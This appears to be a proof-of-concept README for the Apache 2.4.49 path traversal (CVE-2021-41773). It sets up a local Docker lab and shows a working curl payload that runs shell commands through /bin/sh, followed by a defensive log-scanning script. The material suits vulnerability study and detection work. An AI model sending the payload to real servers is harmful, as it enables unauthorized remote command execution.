CVE-2021-41773 vulnerability

Path traversal vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)

For educational purposes only

Test

Set up the PoC environment

$ docker run --rm -dit -p 8000:80 ghcr.io/hbertsch/cve-2021-41773

Option 2: Manual Build

$ docker build -t cve-2021-41773 . 
$ docker run --rm -dit -p 8000:80 cve-2021-41773

Confirm it works

Check whether the server is running

$ curl http://localhost:8000
# Result
<html><body><h1>It works!</h1></body></html>

Exploit

Send any command you want like this:

$ curl 'http://127.0.0.1:8000/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'echo;ls'
# Result
bash
cat
chgrp
chmod
chown
cp
dash
date
dd
df
dir
dmesg
dnsdomainname
domainname
echo
egrep
false
fgrep
findmnt
grep
gunzip
gzexe
gzip
hostname
ln
login
...
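
Detection

On the defender's side, the request above leaves a recognisable trace in the Apache access log: a `..` path segment that only exists after percent-decoding. The following is an added example, not part of the original README, that scans log lines for that pattern; the log lines are constructed samples, the function names are hypothetical, and the repeated decoding goes beyond the single-encoded case shown on this page.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Oct/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 45',
    '198.51.100.7 - - [06/Oct/2021:10:01:09 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 312',
    '192.0.2.10 - - [06/Oct/2021:10:01:15 +0000] "GET /docs/release%2enotes.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [06/Oct/2021:10:02:40 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 403 199',
]

def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly until stable, so nested encodings are unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def dotdot_count(path):
    """Number of path segments that are exactly '..'."""
    return sum(1 for seg in path.split("/") if seg == "..")

def encoded_traversal(target):
    """True if decoding the path reveals '..' segments that were not literal.

    Literal '../' is ignored here; an encoded dot inside a dot-segment
    (as in '.%2e/') is what the request on this page relies on.
    """
    raw_path = target.split("?", 1)[0]
    return dotdot_count(fully_decode(raw_path)) > dotdot_count(raw_path)

def scan(lines):
    """Return (client, method, target, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and encoded_traversal(m.group(3)):
            hits.append((m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return hits

if __name__ == "__main__":
    for client, method, target, status in scan(SAMPLE_LOG):
        outcome = "served" if 200 <= status < 300 else "rejected"
        print(f"{client} {method} {target} -> {status} ({outcome})")
```

A hit with a 2xx status means the server answered the traversal request and should be triaged first; a 4xx hit shows the attempt was refused.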